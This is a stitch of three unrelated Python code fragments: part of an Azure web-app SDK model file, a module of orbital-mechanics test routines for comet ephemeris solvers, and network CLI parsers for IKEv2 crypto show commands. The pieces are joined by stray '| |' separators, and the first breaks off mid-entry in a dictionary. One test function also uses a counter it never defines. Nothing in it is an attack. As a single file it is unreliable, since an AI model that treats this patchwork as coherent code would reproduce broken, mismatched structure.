'repository_site_name': {'key': 'properties.repositorySiteName', 'type': 'str'},
'usage_state': {'key': 'properties.usageState', 'type': 'str'},
'enabled': {'key': 'properties.enabled', 'type': 'bool'},
'enabled_host_names': {'key': 'properties.enabledHostNames', 'type': '[str]'},
'availability_state': {'key': 'properties.availabilityState', 'type': 'str'},
'host_name_ssl_states': {'key': 'properties.hostNameSslStates', 'type': '[HostNameSslState]'},
'server_farm_id': {'key': 'properties.serverFarmId', 'type': 'str'},
'reserved': {'key': 'properties.reserved', 'type': 'bool'},
'last_modified_time_utc': {'key': 'properties.lastModifiedTimeUtc', 'type': 'iso-8601'},
'site_config': {'key': 'properties.siteConfig', 'type': 'SiteConfig'},
'traffic_manager_host_names': {'key': 'properties.trafficManagerHostNames', 'type': '[str]'},
'scm_site_also_stopped': {'key': 'properties.scmSiteAlsoStopped', 'type': 'bool'},
'target_swap_slot': {'key': 'properties.targetSwapSlot', 'type': 'str'},
'hosting_environment_profile': {'key': 'properties.hostingEnvironmentProfile', 'type': 'HostingEnvironmentProfile'},
'client_affinity_enabled': {'key': 'properties.clientAffinityEnabled', 'type': 'bool'},
'client_cert_enabled': {'key': 'properties.clientCertEnabled', 'type': 'bool'},
'host_names_disabled': {'key': 'properties.hostNamesDisabled', 'type': 'bool'},
'outbound_ip_addresses': {'key': 'properties.outboundIpAddresses', 'type': 'str'},
'possible_outbound_ip_addresses': {'key': 'properties.possibleOutboundIpAddresses', 'type': 'str'},
'container_size': {'key': 'properties.containerSize', 'type': 'int'},
'daily_memory_time_quota': {'key': 'properties.dailyMemoryTimeQuota', 'type': 'int'},
'suspended_till': {'key': 'properties.suspendedTill', 'type': 'iso-8601'},
'max_number_of_workers': {'key': 'properties.maxNumberOfWorkers', 'type': 'int'},
'cloning_info': {'key': 'properties.cloningInfo', 'type': 'CloningInfo'},
'snapshot_info': {'key': 'properties.snapshotInfo', 'type': 'SnapshotRecoveryRequest'},
'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
'is_default_container': {'key': 'properties.isDefaultContainer', 'type': 'bool'},
'default_host_name': {'key': 'properties.defaultHostName', 'type': 'str'},
'slot_swap_status': {'key': 'properties.slotSwapStatus', 'type': 'SlotSwapStatus'},
'https_only': {'key': 'properties.httpsOnly', 'type': 'bool'},
}
def __init__(
self,
*,
location: str,
kind: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
identity: Optional["ManagedServiceIdentity"] = None,
enabled: Optional[bool] = None,
host_name_ssl_states: Optional[List["HostNameSslState"]] = None,
server_farm_id: Optional[str] = None,
reserved: Optional[bool] = False,
site_config: Optional["SiteConfig"] = None,
scm_site_also_stopped: Optional[bool] = False,
hosting_environment_profile: Optional["HostingEnvironmentProfile"] = None,
client_affinity_enabled: Optional[bool] = None,
client_cert_enabled: Optional[bool] = None,
host_names_disabled: Optional[bool] = None,
container_size: Optional[int] = None,
daily_memory_time_quota: Optional[int] = None,
cloning_info: Optional["CloningInfo"] = None,
snapshot_info: Optional["SnapshotRecoveryRequest"] = None,
https_only: Optional[bool] = None,
**kwargs
):
"""
:keyword kind: Kind of resource.
:paramtype kind: str
:keyword location: Required. Resource Location.
:paramtype location: str
:keyword tags: A set of tags. Resource tags.
:paramtype tags: dict[str, str]
:keyword identity: Managed service identity.
:paramtype identity: ~azure.mgmt.web.v2016_09_01.models.ManagedServiceIdentity
:keyword enabled: :code:`<code>true</code>` if the app is enabled; otherwise,
:code:`<code>false</code>`. Setting this value to false disables the app (takes the app
offline).
:paramtype enabled: bool
:keyword host_name_ssl_states: Hostname SSL states are used to manage the SSL bindings for
app's hostnames.
:paramtype host_name_ssl_states: list[~azure.mgmt.web.v2016_09_01.models.HostNameSslState]
:keyword server_farm_id: Resource ID of the associated App Service plan, formatted as:
"/subscriptions/{subscriptionID}/resourceGroups/{groupName}/providers/Microsoft.Web/serverfarms/{appServicePlanName}".
:paramtype server_farm_id: str
:keyword reserved: :code:`<code>true</code>` if reserved; otherwise,
:code:`<code>false</code>`.
:paramtype reserved: bool
:keyword site_config: Configuration of the app.
:paramtype site_config: ~azure.mgmt.web.v2016_09_01.models.SiteConfig
:keyword scm_site_also_stopped: :code:`<code>true</code>` to stop SCM (KUDU) site when the app
is stopped; otherwise, :code:`<code>false</code>`. The default is :code:`<code>false</code>`.
:paramtype scm_site_also_stopped: bool
:keyword hosting_environment_profile: App Service Environment to use for the app.
:paramtype hosting_environment_profile:
~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentProfile
:keyword client_affinity_enabled: :code:`<code>true</code>` to enable client affinity;
:code:`<code>false</code>` to stop sending session affinity cookies, which route client
requests in the same session to the same instance. Default is :code:`<code>true</code>`.
:paramtype client_affinity_enabled: bool
:keyword client_cert_enabled: :code:`<code>true</code>` to enable client certificate
authentication (TLS mutual authentication); otherwise, :code:`<code>false</code>`. Default is
:code:`<code>false</code>`.
:paramtype client_cert_enabled: bool
:keyword host_names_disabled: :code:`<code>true</code>` to disable the public hostnames of the
app; otherwise, :code:`<code>false</code>`.
If :code:`<code>true</code>`, the app is only accessible via API management process.
:paramtype host_names_disabled: bool
:keyword container_size: Size of the function container.
:paramtype container_size: int
:keyword daily_memory_time_quota: Maximum allowed daily memory-time quota (applicable on
dynamic apps only).
:paramtype daily_memory_time_quota: int
:keyword cloning_info: If specified during app creation, the app is cloned from a source app.
:paramtype cloning_info: ~azure.mgmt.web.v2016_09_01.models.CloningInfo
:keyword snapshot_info: If specified during app creation, the app is created from a previous
snapshot.
:paramtype snapshot_info: ~azure.mgmt.web.v2016_09_01.models.SnapshotRecoveryRequest
:keyword https_only: HttpsOnly: configures a web site to accept only https requests. Issues
redirect for
http requests.
:paramtype https_only: bool
"""
super(Site, self).__init__(kind=kind, location=location, tags=tags, **kwargs)
self.identity = identity
self.state = None
self.host_names = None
self.repository_site_name = None
self.usage_state = None
self.enabled = enabled
self.enabled_host_names = None
self.availability_state = None
self.host_name_ssl_states = host_name_ssl_states
self.server_farm_id = server_farm_id
self.reserved = reserved
self.last_modified_time_utc = None
self.site_config = site_config
self.traffic_manager_host_names = None
self.scm_site_also_stopped = scm_site_also_stopped
self.target_swap_slot = None
self.hosting_environment_profile = hosting_environment_profile
self.client_affinity_enabled = client_affinity_enabled
self.client_cert_enabled = client_cert_enabled
self.host_names_disabled = host_names_disabled
self.outbound_ip_addresses = None
self.possible_outbound_ip_addresses = None
self.container_size = container_size
self.daily_memory_time_quota = daily_memory_time_quota
self.suspended_till = None
self.max_number_of_workers = None
self.cloning_info = cloning_info
self.snapshot_info = snapshot_info
self.resource_group = None
self.is_default_container = None
self.default_host_name = None
self.slot_swap_status = None
self.https_only = https_only
class SiteConfig(msrest.serialization.Model):
"""Configuration of an App Service app.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar number_of_workers: Number of workers.
:vartype number_of_workers: int
:ivar default_documents: Default documents.
:vartype default_documents: list[str]
:ivar net_framework_version: .NET Framework version.
:vartype net_framework_version: str
:ivar php_version: Version of PHP.
:vartype php_version: str
:ivar python_version: Version of Python.
:vartype python_version: str
:ivar node_version: Version of Node.js.
:vartype node_version: str
:ivar linux_fx_version: Linux App Framework and version.
:vartype linux_fx_version: str
:ivar request_tracing_enabled: :code:`<code>true</code>` if request tracing is enabled;
otherwise, :code:`<code>false</code>`.
:vartype request_tracing_enabled: bool
:ivar request_tracing_expiration_time: Request tracing expiration time.
:vartype request_tracing_expiration_time: ~datetime.datetime
:ivar remote_debugging_enabled: :code:`<code>true</code>` if remote debugging is enabled;
otherwise, :code:`<code>false</code>`.
:vartype remote_debugging_enabled: bool
:ivar remote_debugging_version: Remote debugging version.
:vartype remote_debugging_version: str
:ivar http_logging_enabled: :code:`<code>true</code>` if HTTP logging is enabled; otherwise,
:code:`<code>false</code>`.
:vartype http_logging_enabled: bool
:ivar logs_directory_size_limit: HTTP logs directory size limit.
:vartype logs_directory_size_limit: int
:ivar detailed_error_logging_enabled: :code:`<code>true</code>` if detailed error logging is
enabled; otherwise, :code:`<code>false</code>`.
:vartype detailed_error_logging_enabled: bool
:ivar publishing_username: Publishing user name.
:vartype publishing_username: str
:ivar app_settings: Application settings.
:vartype app_settings: list[~azure.mgmt.web.v2016_09_01.models.NameValuePair]
:ivar connection_strings: Connection strings.
:vartype connection_strings: list[~azure.mgmt.web.v2016_09_01.models.ConnStringInfo]
:ivar machine_key: Site MachineKey.
:vartype machine_key: ~azure.mgmt.web.v2016_09_01.models.SiteMachineKey
:ivar handler_mappings: Handler mappings.
:vartype handler_mappings: list[~azure.mgmt.web.v2016_09_01.models.HandlerMapping]
:ivar document_root: Document root.
:vartype document_root: str
:ivar scm_type: SCM type. Possible values include: "None", "Dropbox", "Tfs", "LocalGit",
"GitHub", "CodePlexGit", "CodePlexHg", "BitbucketGit", "BitbucketHg", "ExternalGit",
"ExternalHg", "OneDrive", "VSO".
:vartype scm_type: str or ~azure.mgmt.web.v2016_09_01.models.ScmType
:ivar use32_bit_worker_process: :code:`<code>true</code>` to use 32-bit worker process;
otherwise, :code:`<code>false</code>`.
:vartype use32_bit_worker_process: bool
:ivar web_sockets_enabled: :code:`<code>true</code>` if WebSocket is enabled; otherwise,
:code:`<code>false</code>`.
:vartype web_sockets_enabled: bool
:ivar always_on: :code:`<code>true</code>` if Always On is enabled; otherwise,
:code:`<code>false</code>`.
:vartype always_on: bool
:ivar java_version: Java version.
:vartype java_version: str
:ivar java_container: Java container.
:vartype java_container: str
:ivar java_container_version: Java container version.
:vartype java_container_version: str
:ivar app_command_line: App command line to launch.
:vartype app_command_line: str
:ivar managed_pipeline_mode: Managed pipeline mode. Possible values include: "Integrated",
"Classic".
:vartype managed_pipeline_mode: str or ~azure.mgmt.web.v2016_09_01.models.ManagedPipelineMode
:ivar virtual_applications: Virtual applications.
:vartype virtual_applications: list[~azure.mgmt.web.v2016_09_01.models.VirtualApplication]
:ivar load_balancing: Site load balancing. Possible values include: "WeightedRoundRobin",
"LeastRequests", "LeastResponseTime", "WeightedTotalTraffic", "RequestHash".
:vartype load_balancing: str or ~azure.mgmt.web.v2016_09_01.models.SiteLoadBalancing
:ivar experiments: This is work around for polymorphic types.
:vartype experiments: ~azure.mgmt.web.v2016_09_01.models.Experiments
:ivar limits: Site limits.
:vartype limits: ~azure.mgmt.web.v2016_09_01.models.SiteLimits
:ivar auto_heal_enabled: :code:`<code>true</code>` if Auto Heal is enabled; otherwise,
:code:`<code>false</code>`.
:vartype auto_heal_enabled: bool
:ivar auto_heal_rules: Auto Heal rules.
:vartype auto_heal_rules: ~azure.mgmt.web.v2016_09_01.models.AutoHealRules
:ivar tracing_options: Tracing options.
:vartype tracing_options: str
:ivar vnet_name: Virtual Network name.
:vartype vnet_name: str
:ivar cors: Cross-Origin Resource Sharing (CORS) settings.
:vartype cors: ~azure.mgmt.web.v2016_09_01.models.CorsSettings
:ivar push: Push endpoint settings.
:vartype push: ~azure.mgmt.web.v2016_09_01.models.PushSettings
:ivar api_definition: Information about the formal API definition for the app.
:vartype api_definition: ~azure.mgmt.web.v2016_09_01.models.ApiDefinitionInfo
:ivar auto_swap_slot_name: Auto-swap slot name.
:vartype auto_swap_slot_name: str
:ivar local_my_sql_enabled: :code:`<code>true</code>` to enable local MySQL; otherwise,
:code:`<code>false</code>`.
:vartype local_my_sql_enabled: bool
:ivar ip_security_restrictions: IP security restrictions.
:vartype ip_security_restrictions:
list[~azure.mgmt.web.v2016_09_01.models.IpSecurityRestriction]
:ivar http20_enabled: Http20Enabled: configures a web site to allow clients to connect over
http2.0.
:vartype http20_enabled: bool
:ivar min_tls_version: MinTlsVersion: configures the minimum version of TLS required for SSL
requests. Possible values include: "1.0", "1.1", "1.2".
:vartype min_tls_version: str or ~azure.mgmt.web.v2016_09_01.models.SupportedTlsVersions
"""
_validation = {
'machine_key': {'readonly': True},
}
_attribute_map = {
'number_of_workers': {'key': 'numberOfWorkers', 'type': 'int'},
'default_documents': {'key': 'defaultDocuments', 'type': '[str]'},
'net_framework_version': {'key': 'netFrameworkVersion', 'type': 'str'},
'php_version': {'key': 'phpVersion', 'type': 'str'},
'python_version': {'key': 'pythonVersion', 'type': 'str'},
'node_version': {'key': 'nodeVersion', 'type': 'str'},
'linux_fx_version': {'key': 'linuxFxVersion', 'type': 'str'},
'request_tracing_enabled': {'key': 'requestTracingEnabled', 'type': 'bool'},
'request_tracing_expiration_time': {'key': 'requestTracingExpirationTime', 'type': 'iso-8601'},
'remote_debugging_enabled': {'key': 'remoteDebuggingEnabled', | |
""" This module provides the functionality to calculate ephemeris for two bodies problem
also in the case of perturbed methods. More advance pertubed methods will be handled
in other module
"""
# Standard library imports
import logging
from math import isclose
from typing import ForwardRef
# Third party imports
import pandas as pd
import numpy as np
from numpy.linalg import norm
from toolz import pipe
# Local application imports
from myorbit.util.general import my_range, NoConvergenceError, my_isclose
import myorbit.data_catalog as dc
from myorbit.util.timeut import mjd2str_date
from myorbit.planets import g_xyz_equat_sun_j2000
from myorbit.kepler.keplerian import KeplerianStateSolver, ParabolicalStateSolver, EllipticalStateSolver
from myorbit.kepler.ellipitical import calc_rv_for_elliptic_orbit, calc_M
from myorbit.lagrange.lagrange_coeff import calc_rv_from_r0v0
from myorbit.util.general import mu_Sun, calc_eccentricity_vector, angle_between_vectors
from myorbit.pert_cowels import calc_eph_by_cowells
from myorbit.two_body import calc_eph_planet
from myorbit.util.timeut import EQX_B1950, EQX_J2000
from myorbit.ephemeris_input import EphemrisInput
from myorbit.pert_enckes import calc_eph_by_enckes
from myorbit.two_body import calc_eph_twobody
from myorbit.util.constants import *
logger = logging.getLogger(__name__)
def calc_tp(M0, a, epoch):
deltaT = TWOPI*np.sqrt(pow(a,3)/GM)*(1-M0/TWOPI)
return deltaT + epoch
def calc_comets_that_no_converge(delta_days):
"""The orbit of all comets is studied around the perihelion [-days, +days]
Parameters
----------
delta_days : int
[description]
"""
df = dc.DF_COMETS
not_converged=[]
for idx, name in enumerate(df['Name']):
obj = dc.read_comet_elms_for(name,df)
msg = f'Testing Object: {obj.name}'
print (msg)
logger.info(msg)
if hasattr(obj,'M0') :
M_at_epoch = obj.M0
else :
M_at_epoch = None
# from 20 days before perihelion passage to 20 days after 20 days perihelion passage
solver = KeplerianStateSolver.make(e=obj.e, a=obj.a, tp_mjd=obj.tp_mjd, q=obj.q, epoch=obj.epoch_mjd, M_at_epoch=M_at_epoch)
T0_MJD = obj.tp_mjd-delta_days
r0_xyz, rdot0_xyz, r0, h0_xyz, _ , f0 = solver.calc_rv(T0_MJD)
hs = []
es = []
for dt in range(2,delta_days*2,2):
clock_mjd = T0_MJD + dt
try :
r_xyz, rdot_xyz, h_xyz, f = calc_rv_from_r0v0(mu_Sun, r0_xyz, rdot0_xyz, dt, f0)
hs.append(np.linalg.norm(h_xyz))
es.append(np.linalg.norm(calc_eccentricity_vector(r_xyz, rdot_xyz,h_xyz)))
except NoConvergenceError :
print (f"===== Object {name} doest not converged at {clock_mjd} MJD")
not_converged.append(name)
if not all(isclose(h, hs[0], abs_tol=1e-12) for h in hs):
msg = f'The angular momentum is NOT constant in the orbit'
print (msg)
logger.error(msg)
if not all(isclose(ec, es[0], abs_tol=1e-12) for ec in es):
msg = f'The eccentric vector is NOT constant in the orbit'
print (msg)
logger.error(msg)
print (not_converged)
def test_all_bodies(delta_days):
df = dc.DF_BODIES
not_converged=[]
for idx, name in enumerate(df['Name']):
body = dc.read_body_elms_for(name,df)
msg = f'Testing Object: {body.name}'
solver = KeplerianStateSolver.make(e=body.e, a=body.a, epoch=body.epoch_mjd, M_at_epoch=body.M0)
tp = calc_tp(body.M0, body.a, body.epoch_mjd)
hs = []
try :
for clock_mjd in my_range(tp-delta_days, tp+delta_days, 2):
r_xyz, rdot_xyz, r, h = solver.calc_rv(clock_mjd)
hs.append(h)
if not all(isclose(h, hs[0], abs_tol=1e-12) for h in hs):
msg = f'The angular momentum is NOT constant in the orbit'
print (msg)
logger.error(msg)
except NoConvergenceError :
print (f"===========> NOT converged for object {name}")
not_converged.append(name)
if idx % 1000 == 0 :
print (f"================================================>> {idx}")
print (not_converged)
def test_almost_parabolical(delta_days):
df = dc.DF_COMETS
not_converged=[]
names = ['C/1680 V1', 'C/1843 D1 (Great March comet)', 'C/1882 R1-A (Great September comet)', 'C/1882 R1-B (Great September comet)', 'C/1882 R1-C (Great September comet)', 'C/1882 R1-D (Great September comet)', 'C/1963 R1 (Pereyra)', 'C/1965 S1-A (Ikeya-Seki)', 'C/1965 S1-B (Ikeya-Seki)', 'C/1967 C1 (Seki)', 'C/1970 K1 (White-Ortiz-Bolelli)', 'C/2004 V13 (SWAN)', 'C/2011 W3 (Lovejoy)', 'C/2013 G5 (Catalina)', 'C/2020 U5 (PANSTARRS)']
#names = ['C/2020 U5 (PANSTARRS)']
df = df[df.Name.isin(names)]
for idx, name in enumerate(df['Name']):
if name not in names :
continue
obj = dc.read_comet_elms_for(name,df)
msg = f'Testing Object: {obj.name} with Tp:{mjd2str_date(obj.tp_mjd)}'
print (msg)
logger.info(msg)
if hasattr(obj,'M0') :
M_at_epoch = obj.M0
else :
M_at_epoch = None
# from 20 days before perihelion passage to 20 days after 20 days perihelion passage
#solver = ParabolicalStateSolver(obj.tp_mjd, obj.q, obj.e)
solver = EllipticalStateSolver(q=obj.q, a=obj.a, e=obj.e, tp_mjd=obj.tp_mjd, epoch_mjd=obj.epoch_mjd)
hs = []
for clock_mjd in my_range(obj.tp_mjd-delta_days, obj.tp_mjd+delta_days, 2):
r_xyz, rdot_xyz, r, h_xyz, *others = solver.calc_rv(clock_mjd)
hs.append(h_xyz)
print(mjd2str_date(clock_mjd))
if not all(np.allclose(h_xyz, hs[0], atol=1e-12) for h_xyz in hs):
msg = f'The angular momentum is NOT constant in the orbit'
print (msg)
logger.error(msg)
print (not_converged)
def test_comets_convergence(delta_days=50):
df = dc.DF_COMETS
#FILTERED_OBJS = ['C/1680 V1', 'C/1843 D1 (Great March comet)', 'C/1882 R1-A (Great September comet)', 'C/1882 R1-B (Great September comet)', 'C/1882 R1-C (Great September comet)', 'C/1882 R1-D (Great September comet)', 'C/1963 R1 (Pereyra)', 'C/1965 S1-A (Ikeya-Seki)', 'C/1965 S1-B (Ikeya-Seki)', 'C/1967 C1 (Seki)', 'C/1970 K1 (White-Ortiz-Bolelli)', 'C/2004 V13 (SWAN)', 'C/2011 W3 (Lovejoy)', 'C/2013 G5 (Catalina)', 'C/2020 U5 (PANSTARRS)']
#FILTERED_OBJS=['C/1827 P1 (Pons)']
FILTERED_OBJS=[]
if len(FILTERED_OBJS) != 0:
df = df[df.Name.isin(FILTERED_OBJS)]
result = []
df = df.sort_values('e', ascending=False)
for idx, name in enumerate(df['Name']):
obj = dc.read_comet_elms_for(name,df)
solver = KeplerianStateSolver.make(e=obj.e, a=obj.a, tp_mjd=obj.tp_mjd, q=obj.q, epoch=obj.epoch_mjd)
T0_MJD = obj.tp_mjd-delta_days
r0_xyz, rdot0_xyz, r0, h0_xyz, _ , f0 = solver.calc_rv(T0_MJD)
kep_nc = uni_nc = 0
#print (f"Object {name} with e={obj.e}")
for dt in range(2,delta_days*2,2):
r1_xyz = rdot1_xyz = f1 = None
try :
r1_xyz, rdot1_xyz, r1, h1_xyz, _ , f1 = solver.calc_rv(T0_MJD+dt)
except NoConvergenceError :
kep_nc += 1
r2_xyz = rdot2_xyz = f2 = None
try :
r2_xyz, rdot2_xyz, h_xyz, f2 = calc_rv_from_r0v0(mu_Sun, r0_xyz, rdot0_xyz, dt, f0)
except NoConvergenceError :
uni_nc += 1
print (f"The noconvergence was with e: {obj.e}")
if (kep_nc >0) or (uni_nc > 0) :
row = {}
row['name'] = name
row['e'] = obj.e
row['kep_nc'] = kep_nc
row['uni_nc'] = uni_nc
result.append(row)
df_out = pd.DataFrame(result)
if len(df_out) > 0:
print (f'There are {len(df_out)} comets with convergence problems')
df_out = df_out.sort_values(by=['uni_nc','kep_nc'],ascending=False)
df_out.to_csv('convergence_problems.csv',index=False,header=True)
else :
print ("Undetected no-convergences")
def test_universal_kepler(delta_days=50):
df = dc.DF_COMETS
FILTERED_OBJS=[]
#FILTERED_OBJS=['C/1933 D1 (Peltier)','C/1989 R1 (Helin-Roman)','C/2007 M5 (SOHO)','C/1988 M1 (SMM)','C/2008 C5 (SOHO)']
#FILTERED_OBJS=['C/2007 M5 (SOHO)']
# C/2000 O1 (Koehn)
# This one has high nonconverence with 500 C/2000 O1 (Koehn)
if len(FILTERED_OBJS) != 0:
df = df[df.Name.isin(FILTERED_OBJS)]
df = df.sort_values('e', ascending=False)
result = []
for idx, name in enumerate(df['Name']):
obj = dc.read_comet_elms_for(name,df)
#print (name)
solver = KeplerianStateSolver.make(e=obj.e, a=obj.a, tp_mjd=obj.tp_mjd, q=obj.q, epoch=obj.epoch_mjd)
T0_MJD = obj.tp_mjd-delta_days
r0_xyz, rdot0_xyz, r0, h0_xyz, _ , f0 = solver.calc_rv(T0_MJD)
r_failed = v_failed = f_failed = nc_failed= 0
for dt in range(2,delta_days*2,2):
try :
r1_xyz, rdot1_xyz, r1, h1_xyz, _ , f1 = solver.calc_rv(T0_MJD+dt)
r2_xyz, rdot2_xyz, h2_xyz, f2 = calc_rv_from_r0v0(mu_Sun, r0_xyz, rdot0_xyz, dt, f0)
e_xyz = calc_eccentricity_vector(r1_xyz, rdot1_xyz, h1_xyz)
f3 = angle_between_vectors(e_xyz, r1_xyz)
if not isclose(f1,f2,rel_tol=0, abs_tol=1e-03):
f_failed += 1
msg=f"name: {obj.name}, TWOPI - f univ: {TWOPI-f2} f Universal: {f2} f Kepler: {f1} e:{obj.e} f Excentricity: {f3} f Excentricity: {TWOPI-f3}"
logger.error(msg)
if not my_isclose(r1_xyz, r2_xyz, abs_tol=1e-03):
msg = f"name: {obj.name}, e: {obj.e}, diff_rxyz ={np.linalg.norm(r1_xyz- r2_xyz)} diff_rdotxyz: {np.linalg.norm(rdot1_xyz- rdot2_xyz)}"
logger.error(msg)
r_failed += 1
if not my_isclose (rdot1_xyz, rdot2_xyz, abs_tol=1e-03) :
v_failed += 1
except NoConvergenceError :
nc_failed += 1
if (f_failed >0) or (r_failed > 0) or (v_failed > 0) or (nc_failed > 0):
row = {}
row['name'] = name
row['e'] = obj.e
row['f_failed'] = f_failed
row['r_failed'] = r_failed
row['v_failed'] = v_failed
row['nc_failed'] = nc_failed
result.append(row)
df_out = pd.DataFrame(result)
if len(df_out) > 0:
print (f'There are {len(df_out)} comets with convergence problems')
#df_out = df_out.sort_values(by=['uni_nc','kep_nc'],ascending=False)
df_out.to_csv('kepler_universal.csv',index=False,header=True)
print (df_out)
else :
print ("No problems detected")
def test_enckes():
obj= dc.C_2003_M3_SOHO
eph = EphemrisInput(from_date="2001.03.01.0",
to_date = "2005.08.31.0",
step_dd_hh_hhh = "02 00.0",
equinox_name = EQX_J2000)
dfc = calc_eph_by_enckes(obj, eph)
def test_comet(name, delta_days=50):
obj = dc.read_comet_elms_for(name,dc.DF_COMETS)
solver = KeplerianStateSolver.make(e=obj.e, a=obj.a, tp_mjd=obj.tp_mjd, q=obj.q, epoch=obj.epoch_mjd)
T0_MJD = obj.tp_mjd-delta_days
#print (f"Time interval considered: from:{mjd2str_date(T0_MJD-delta_days)} to {mjd2str_date(T0_MJD+delta_days)}")
r0_xyz, rdot0_xyz, r0, h0_xyz, _ , f0 = solver.calc_rv(T0_MJD)
max_diff_r = 0
for dt in range(2,delta_days*2,2):
try :
print (f"{mjd2str_date(T0_MJD+dt)}")
r1_xyz, rdot1_xyz, r1, h1_xyz, _ , f1 = solver.calc_rv(T0_MJD+dt)
r2_xyz, rdot2_xyz, h2_xyz, f2 = calc_rv_from_r0v0(mu_Sun, r0_xyz, rdot0_xyz, dt, f0)
if not isclose(f1,f2, rel_tol=0, abs_tol=1e-03):
msg=f"{mjd2str_date(T0_MJD+dt)} f Uni:{f2} f Kepler:{f1} TWOPI-f:{TWOPI-f1}"
print (msg)
logger.error(msg)
if not my_isclose(r1_xyz, r2_xyz, abs_tol=1e-07):
diff_rxyz = np.linalg.norm(r1_xyz- r2_xyz)
if diff_rxyz > max_diff_r :
max_diff_r = diff_rxyz
print (f"Maximun distance at time:{mjd2str_date(T0_MJD+dt)}")
msg = f"{mjd2str_date(T0_MJD+dt)}, diff_rxyz ={np.linalg.norm(r1_xyz- r2_xyz)} diff_rdotxyz: {np.linalg.norm(rdot1_xyz- rdot2_xyz)}"
print (msg)
logger.error(msg)
except NoConvergenceError :
nc_failed += 1
def test_near_parabollic():
obj=dc.C_2007_M5_SOHO
eph = EphemrisInput(from_date="2007.06.15.0",
to_date = "2007.07.15.0",
step_dd_hh_hhh = "02 00.0",
equinox_name = EQX_J2000)
df = calc_eph_twobody(obj, eph, force_orbit='near_parabolical')
#df = calc_eph_twobody(obj, eph)
print (df)
def change_reference_frame(heliocentric_orbs, name):
orbs_from_obj = dict()
# A new orbs object is created changing the frame of reference to the object (name of the object)
# The object should be included in the helliocentric_orbs
for body_name in filter(lambda x : x.lower()!=name.lower(), heliocentric_orbs.keys()):
orbs_from_obj[body_name] = heliocentric_orbs[body_name] - heliocentric_orbs[name]
| |
'prf': str,
'dh_group': list,
}
},
}
# =================================================
# Parser for
# Parser for 'show crypto ikev2 proposal'
# =================================================
class ShowCryptoIkev2Proposal(ShowCryptoIkev2ProposalSchema):
"""Parser for show crypto ikev2 proposal"""
cli_command = ['show crypto ikev2 proposal']
def cli(self, output=None):
if output is None:
output = self.device.execute(self.cli_command[0])
# initial return dictionary
ret_dict = {}
# IKEv2 proposal: default
p1 = re.compile(r'^IKEv2 proposal\s*:\s*(?P<proposal_name>.*)$')
# Encryption : AES-CBC-256
p2 = re.compile(r'^Encryption\s*:\s*(?P<encryption>[\w-]+)$')
# Integrity : SHA512 SHA384
p3 = re.compile(r'^Integrity\s*:\s*(?P<integrity>.*)$')
# PRF : SHA512 SHA384
p4 = re.compile(r'^PRF\s*:\s*(?P<prf>.*)$')
# DH Group : DH_GROUP_256_ECP/Group 19 DH_GROUP_2048_MODP/Group 14 DH_GROUP_521_ECP/Group 21 DH_GROUP_1536_MODP/Group 5
p5 = re.compile(r'^DH Group\s*:\s*(?P<dh_group>.*)$')
ret_dict = {}
for line in output.splitlines():
line = line.strip()
# IKEv2 proposal: default
m = p1.match(line)
if m:
groups = m.groupdict()
proposal_name = groups['proposal_name']
proposal_name_dict = ret_dict.setdefault('proposal_name',{}).setdefault(proposal_name,{})
continue
# Encryption : AES-CBC-256
m = p2.match(line)
if m:
groups = m.groupdict()
encryption = groups['encryption']
proposal_name_dict['encryption'] = encryption
continue
# Integrity : SHA512 SHA384
m = p3.match(line)
if m:
groups = m.groupdict()
integrity = groups['integrity']
proposal_name_dict['integrity'] = integrity
continue
# PRF : SHA512 SHA384
m = p4.match(line)
if m:
groups = m.groupdict()
prf = groups['prf']
proposal_name_dict['prf'] = prf
continue
# DH Group : DH_GROUP_256_ECP/Group 19 DH_GROUP_2048_MODP/Group 14 DH_GROUP_521_ECP/Group 21 DH_GROUP_1536_MODP/Group 5
m = p5.match(line)
if m:
l2 = ''
groups = m.groupdict()
dh_group = groups['dh_group']
dh_group = dh_group.split()
dh_group_list = []
for i in range(len(dh_group)):
if i==0 or i%2==0:
l2 = l2+dh_group[i]
else:
l2 = l2+' '+dh_group[i]
dh_group_list.append(l2)
l2 = ''
proposal_name_dict['dh_group'] = dh_group_list
continue
return ret_dict
# =================================================
# Schema for
# Schema for 'show crypto ikev2 policy'
# =================================================
class ShowCryptoIkev2PolicySchema(MetaParser):
"""Schema for show crypto ikev2 policy"""
schema = {
'policy_name':{
Any(): {
'match_fvrf': str,
'match_address_local': str,
'proposal': str,
}
},
}
# =================================================
# Parser for
# Parser for 'show crypto ikev2 policy'
# =================================================
class ShowCryptoIkev2Policy(ShowCryptoIkev2PolicySchema):
"""Parser for show crypto ikev2 policy"""
cli_command = ['show crypto ikev2 policy']
def cli(self, output=None):
if output is None:
output = self.device.execute(self.cli_command[0])
# initial return dictionary
ret_dict = {}
# IKEv2 policy : ikev2policy
p1 = re.compile(r'^IKEv2 policy\s*:\s*(?P<policy_name>.*)$')
# Match fvrf : global
p2 = re.compile(r'^Match fvrf\s*:\s*(?P<match_fvrf>\w+)$')
# Match address local : any
p3 = re.compile(r'^Match address local\s*:\s*(?P<match_address_local>\w+)$')
# Proposal : ikev2proposal
p4 = re.compile(r'^Proposal\s*:\s*(?P<proposal>.*)$')
ret_dict = {}
for line in output.splitlines():
line = line.strip()
# IKEv2 policy : ikev2policy
m = p1.match(line)
if m:
groups = m.groupdict()
policy_name = groups['policy_name']
policy_name_dict = ret_dict.setdefault('policy_name',{}).setdefault(policy_name,{})
continue
# Match fvrf : global
m = p2.match(line)
if m:
groups = m.groupdict()
match_fvrf = groups['match_fvrf']
policy_name_dict['match_fvrf'] = match_fvrf
continue
# Match address local : any
m = p3.match(line)
if m:
groups = m.groupdict()
match_address_local = groups['match_address_local']
policy_name_dict['match_address_local'] = match_address_local
continue
# Proposal : ikev2proposal
m = p4.match(line)
if m:
groups = m.groupdict()
proposal = groups['proposal']
policy_name_dict['proposal'] = proposal
continue
return ret_dict
# =================================================
# Schema for 'show crypto ikev2 sa '
# =================================================
class ShowCryptoIkev2SaSchema(MetaParser):
"""Schema for show crypto ikev2 sa"""
schema = {
'ipv4': {
Any(): {
'tunnel_id': int,
'local_ip': str,
'local_port': int,
'remote_ip': str,
'remote_port': int,
'fvrf': str,
'ivrf': str,
'status': str,
'encryption': str,
'keysize': int,
'prf': str,
'hash': str,
'dh_group': int,
'auth_sign': str,
'auth_verify': str,
'life_time': int,
'active_time': int,
Optional('ce_id'): int,
Optional('session_id'): int,
Optional('local_spi'): str,
Optional('remote_spi'): str,
}
